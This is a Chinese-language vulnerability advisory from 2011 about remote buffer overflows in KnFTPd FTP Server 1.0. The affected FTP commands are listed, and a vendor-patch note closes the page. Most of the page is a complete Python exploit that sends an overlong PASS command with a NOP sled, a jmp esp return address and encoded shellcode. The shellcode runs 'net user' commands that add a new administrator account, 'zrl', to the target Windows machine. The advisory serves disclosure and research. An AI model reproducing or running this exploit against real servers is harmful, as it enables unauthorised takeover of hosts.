发布日期：2011-09-02
更新日期：2011-09-02

受影响系统：

KFTPD KnFTPd FTP Server 1.0

描述：

---

BUGTRAQ  ID: 49427

KnFTPD是由uw开发的一款FTP服务器。

KnFTPd FTP服务器在多个命令的实现上存在远程缓冲区溢出漏洞，远程攻击者可利用此漏洞在受影响应用程序中执行任意代码或造成拒绝服务。

向多个FTP命令(USER、PASS、REIN、QUIT、PORT、PASV、TYPE、STRU、MODE、RETR、STOR、APPE、ALLO、REST、RNFR、RNTO、ABOR、DELE、CWD、LIST、NLST、SITE、STST、HELP、NOOP、MKD、RMD、PWD、CDUP、STOU、SNMT、SYST、XPWD)，发送超长请求可触发此漏洞。

<*来源：liuqx
  
  链接：http://www.securityfocus.com/archive/1/519498
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# !/usr/bin/python
# KnFTPd FTP Server v1.0.0 Multiple Command Remote Buffer Overflow Exploit
# Software Link: http://sourceforge.net/projects/knftp/files/KnFTPd/1.0.0/
# Affected Version:1.0.0
# Affected Command:
# "USER","PASS","REIN","QUIT","PORT","PASV","TYPE","STRU",
# "MODE","RETR","STOR","APPE","ALLO","REST","RNFR","RNTO",
# "ABOR","DELE","CWD","LIST","NLST","SITE","STST","HELP",
# "NOOP","MKD","RMD","PWD","CDUP","STOU","SNMT","SYST","XPWD"
#
# Vulnerability Discovered by Qixu Liu of NCNIPC (liuqx (at) nipc.org (dot) cn [email concealed])
# Date: 02/09/2011
# Thanks to: Zhejun Fang, Cheng Luo
# Tested on: Windows XP SP3 Chinese (zh-cn)
# Shellcode: Exploiting "PASS" Command to add a new system user "zrl:123456"

from struct import pack
import socket,sys
import os

if len(sys.argv) != 3:
print "Usage: knftpd_exploit.py [IP] [PORT]"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

shellcode= "\x33\xdb\xb7\x02\x2b\xe3"
shellcode+= "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c"
shellcode+= "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
shellcode+= "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
shellcode+= "\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64"
shellcode+= "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
shellcode+= "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
shellcode+= "\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20"
shellcode+= "\x75\x73\x65\x72\x20\x7a\x72\x6c"

eip ="\x12\x45\xfa\x7f"    #jmp esp
eip += "\x90"*8
eip += "\xe9\x06\xff\xff\xff"
nops = "\x90" * 157

payload = "\x90" * 57 + shellcode + "\x90" * 94 +eip

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
connect=s.connect((target, port))
print "[+] Target FTP Connected!"
except:
print "[!] FTP didn't respond\n"
sys.exit(0)

s.send('USER test \r\n')
s.recv(1024)

print "[+] Sending payload...length " +str(len(payload))
s.send('PASS ' + payload +' \r\n')
s.recv(1024)

print "[!] Exploit has been sent!. Please check the new user 'zrl'\n"
s.close()

建议：

---

厂商补丁：

KFTPD
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://kftpd.software.informer.com/

浏览次数：3613
严重程度：0（网友投票）